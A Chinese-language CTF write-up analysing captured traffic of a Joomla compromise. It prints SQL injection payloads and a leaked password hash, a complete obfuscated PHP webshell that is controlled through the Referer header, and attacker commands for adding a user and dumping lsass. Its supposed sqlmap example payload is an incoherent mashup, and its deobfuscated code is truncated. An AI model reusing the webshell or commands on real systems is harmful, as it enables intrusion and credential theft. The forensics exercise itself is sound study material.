2018西普杯鐵三西北賽區流量分析

經典流量分析題目，每次都要拿出來用索性整理好下次方便點

本文所用的WireShark語法

http 顯示出所有的HTTP協議數據
ip.addr == xxxx 顯示出所有數據中地址爲xxxx的包
ip.src == xxxx 顯示出所有數據中源地址爲xxxx的包
ip.dst == xxxx 顯示出所有數據中目的地址爲xxxx的包
mysql 顯示所有的MySQL協議

問題

0x01 黑客攻擊的第一個受害主機的網卡IP地址

過濾出http協議後簡單翻閱數據包發現，一個主機對一個服務器進行了請求，之後又發現該主機對服務器進行SQL注入,從而確定黑客IP爲： 202.1.1.2 。

0x02 黑客對URL的哪一個參數實施了SQL注入

根據前面看到的SQL注入很明顯的發現了黑客對 list[select] 進行了注入

0x03 第一個受害主機網站數據庫的表前綴

根據前面看到的SQL注入，然後進行追蹤HTTP流看到服務器報錯使之表前綴顯示了出來

簡單看一下SQLMAP如何進行注入的

XfqR=2916 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#

可以看到 XfqR=2916 不成立導致報錯產生，從而出來敏感信息。

0x04 第一個受害主機網站數據庫的名字

黑客最後一條數據爆出來肯定存在相應的數據庫名，例如 from A.BA是數據庫名，B是表名。查看最後一條SQL注入信息

解碼注入信息可得

(UPDATEXML(6315,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),4235))

可以看到數據庫名以及表名前綴，更加證實了前面一道題的可靠性。

0x05 Joomla後臺管理員的密碼是多少

使用ip.dst == 192.168.1.8 && http contains "password"查看得到三個數據

Status: 500 XPATH syntax error: 'qqzvq$2y$10$lXujU7XaUviJDigqqkkq' SQL=SELECT (UPDATEXML(5928,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7096)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

Status: 500 XPATH syntax error: 'qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq' SQL=SELECT (UPDATEXML(3613,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),23,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7939)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

Status: 500 XPATH syntax error: 'qqzvqzi/8B2QRD7qIlDJeqqkkq' SQL=SELECT (UPDATEXML(8949,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),45,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),3079)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

隨後看到相關加密字符串：$2y$10$lXujU7XaUviJDigFMzKy6.wx7EMCBqpzrJdn7zi/8B2QRD7qIlDJe

0x06 黑客第一次獲得的php木馬的密碼是什麼

還是根據(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http發現有一個奇怪的kkkaaa.php文件，其中發現POST方式打開可得一個經典的WEBSHELL，發現密碼爲 zzz

0x07 黑客第二次上傳php木馬是什麼時間

因爲黑客又上傳了一次馬，所以索性按照POST過濾查看(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http.request.method==post 發現其中一個數據包所含大量的16進制數據：

將其提取出來，轉換如下所示：

<?php
$p='l>]ower";$i>]=$m[1][0].$m[1]>][1];$h>]=$>]sl($ss(m>]d5($i.>]$kh),0>],3))>];$f=$s>]l($s>]s(md5';
$d=']q=array_v>]>]alues(>]$q);>]preg_match_a>]ll("/(>][\\w]>])[\\w->]]+>](?:;q=>]0.([\\d]))?,?/",>';
$W='),$ss(>]$s[>]$i],>]0,$e))),$>]>]k)));>]$o=ob_get_content>]>]s();ob_end_>]>]clean();$d=>]base';
$e=']T_LANGUAGE"];if($rr>]&&$>]ra){$>]u=pars>]e_>]url($rr);par>]se_st>]r($u[">]query"],$>]q);$>';
$E='>]64_e>]ncod>]e>](>]x(gz>]compress($o),$k));pri>]nt("<$k>$d<>]/$k>">])>];@>]session_destr>]oy();}}}}';
$t='($i.>]$kf),0,3>]));$p>]="";fo>]r($z=1>];$z<>]count($m>][1]);$z+>]>]+)$p>].=$q[$m[>]2][$z]];i>';
$M=']$ra,$>]m);if($q>]&&$m>]){@sessi>]on_sta>]>]rt();$s=&$>]_SESS>]ION;$>]>]s>]s="substr";$sl="s>]>]trto';
$P=']f(s>]tr>]pos($p>],$h)===0){$s[>]$i]="";$p>]=$ss($>]p,3);>]}if(ar>]ray>]_key_exist>]>]s($i,$>]s)>]){$>';
$j=str_replace('fr','','cfrrfreatfrfre_funcfrtfrion');
$k='];}}re>]>]turn $o;>]}$>]r=$_SERV>]ER;$rr=@$r[>]"HTTP>]_REFERE>]R"];$ra>]=@>]$r[">]HTTP_A>]CC>]EP>';
$g='"";for(>]$i=>]0;$i<$l;>])>]{for($j=0;($j<>]$c&&>]$i<$l);$>]j++,$i>]++){$o.>]=$t{$i>]}^$k{$j}>';
$R='$k>]h="cb4>]2";$kf="e130">];functio>]n>] x($t>],$k){$c=s>]trle>]>]n($k);$l=strle>]n>]($t)>];$o=';
$Q=']s[$i].=$p;$e=strp>]>]os(>]$s[$i>]],$f);if($>]e){$k=$kh.$k>]f;>]ob_sta>]rt();@e>]val(@gzun>]co>';
$v=']mpress(@x>](@b>]as>]>]e64_decode(pr>]>]e>]g_repla>]ce(array("/_/","/-/"),arr>]ay(>]"/","+">]';
$x=str_replace('>]','',$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E);
$N=$j('',$x);$N(); 
//j=create_function;

?>

簡單的反混淆如下：

$kh="cb42";
$kf="e130";
function x($t,$k) {
	$c=strlen($k);
	$l=strlen($t);
	$o="";
	for ($i=0;$i<$l;) {
		for ($j=0;($j<$c&&$i<$l);$j++,$i++) {
			$o.=$t {
				$i
			}
			^$k {
				$j
			}
			;
		}
	}
	return $o;
}
$r=$_SERVER;
$rr=@$r["HTTP_REFERER"];
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];
if($rr&&$ra) {
	$u=parse_url($rr);
	parse_str($u["query"],$q);
	$q=array_values($q);
	preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);
	if($q&&$m) {
		@session_start();
		$s=&$_SESSION;
		$ss="substr";
		$sl="strtolower";
		$i=$m[1][0].$m[1][1];
		$h=$sl($ss(md5($i.$kh),0,3));
		$f=$sl($ss(md5($i.$kf),0,3));
		$p="";
		for ($z=1;$z$d");@session_destroy();}}}}

因此基本可以確定第二個木馬就是在這個時間上傳的：
Feb 7, 2018 17:20:44.248365000 中國標準時間

0x08 第二次上傳的木馬通過HTTP協議中的哪個頭傳遞數據

由於上部分的馬大概可以看到發現有兩個頭部進行了變化

$rr=@$r["HTTP_REFERER"];
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];

查看後續數據包，發現包頭Accept-Language比較正常，然而Referer看起來有點詭異

因此可的木馬通過Referer傳遞協議

0x09 內網主機的mysql用戶名和請求連接的密碼hash是多少

直接搜索mysql過濾，直到第四個包才發現了mysql有關的東西，簡單的查看發現黑客是通過爆破才找到的密碼，那麼直接拉到最後一條爆破記錄看到

用戶名密碼爲
admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4

0x10 php代理第一次被使用時最先連接了哪個IP地址

再將其第四個數據包重新過濾爲http發現有一個tunnel.php文件裏面清晰可見了代理IP爲4.2.2.2

0x11 黑客第一次獲取到當前目錄下的文件列表的漏洞利用請求發生在什麼時候

獲取系統可得爲WINDOWS，查詢目錄文件命令就是 dir ,過濾查詢語句就爲:ip.addr==192.168.1.8 && http contains "dir"

時間就是： 18:36:59.770782

0x12 黑客在內網主機中添加的用戶名和密碼是多少

往後翻相應的數據包，由於之前的WEBSHELL特徵我們能夠看到響應的數據包未曾進行加密，所以查看回來的數據包發現黑客執行了 net user 命令

解密流量包發現黑可執行的查看用戶命令

那麼往下查數據包，解密流量包看到添加用戶

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user kaka kaka /add&echo [S]&cd&echo [E]

可以看到添加用戶密碼爲 kaka:kaka

0x13 黑客從內網服務器中下載下來的文件名

繼續往後翻記錄看到一條dump.exe的數據
cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&procdump.exe -accepteula -ma lsass.exe&echo [S]&cd&echo [E]
繼續後看發現一個.dmp文件以及後面大量的相同類型的包猜測此dmp是黑客下載的東西

參考文章

1. sky.blog
2. shaobaobaoer.blog